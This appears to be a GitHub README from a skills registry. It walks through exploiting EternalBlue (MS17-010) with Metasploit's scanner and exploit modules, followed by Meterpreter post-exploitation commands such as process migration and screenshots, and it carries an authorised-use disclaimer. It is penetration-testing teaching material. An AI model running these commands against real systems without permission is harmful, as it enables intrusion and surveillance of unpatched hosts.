Exploitation
The Metasploit Exploitation - EternalBlue SMB Exploit module within the Metasploit framework enables security professionals and researchers to test the vulnerability and assess its impact on target systems. This module can also be used to develop custom payloads and exploit techniques for further research and analysis.
Install / Use
/learn @AnamolZ/ExploitationREADME
Metasploit Exploitation - EternalBlue SMB Exploit
This documentation provides a step-by-step guide on how to use Metasploit to exploit the EternalBlue vulnerability in a target system for educational and ethical purposes only.
Prerequisites
Before proceeding, ensure that you have the following prerequisites:
- A Kali Linux machine with Metasploit Framework installed.
- Permission to test on a network and system you own or have explicit permission to access.
Usage
EternalBlue Module
msf6 > search eternal
SMB MS17-010 Scanner
msf6 > use auxiliary/scanner/smb/smb_ms17_010
Target Host
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
EternalBlue Exploit Module
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
Target Host and Local Host
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.69
Exploit the Vulnerability
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
Post-Exploitation with Meterpreter - System Information
After successfully exploiting a target system using Metasploit's Meterpreter, it's essential to gather system information to better understand the compromised host. The sysinfo command is a useful tool for retrieving key information about the target system.
Using the sysinfo Command
To retrieve system information, follow these steps:
-
Access a Meterpreter session on the compromised host. You should already have an active Meterpreter session. If not, establish one by using the appropriate Metasploit exploit.
-
Once you have an active Meterpreter session, you can execute the
sysinfocommand:
meterpreter > sysinfo
meterpreter > ps
meterpreter > migrate 4536
meterpreter > screenshot
Disclaimer
This documentation and the provided commands are intended for educational and ethical purposes only. Unauthorized use of these techniques may be illegal. Ensure you have the appropriate permissions and follow ethical standards when using these tools.
Authors
License
This project is licensed under the MIT License. MIT
Related Skills
YC-Killer
2.7kA library of enterprise-grade AI agents designed to democratize artificial intelligence and provide free, open-source alternatives to overvalued Y Combinator startups. If you are excited about democratizing AI access & AI agents, please star ⭐️ this repository and use the link in the readme to join our open source AI research team.
best-practices-researcher
The most comprehensive Claude Code skills registry | Web Search: https://skills-registry-web.vercel.app
research_rules
Research & Verification Rules Quote Verification Protocol Primary Task "Make sure that the quote is relevant to the chapter and so you we want to make sure that we want to have it identifie
groundhog
398Groundhog's primary purpose is to teach people how Cursor and all these other coding agents work under the hood. If you understand how these coding assistants work from first principles, then you can drive these tools harder (or perhaps make your own!).
Security Score
Audited on Feb 6, 2026
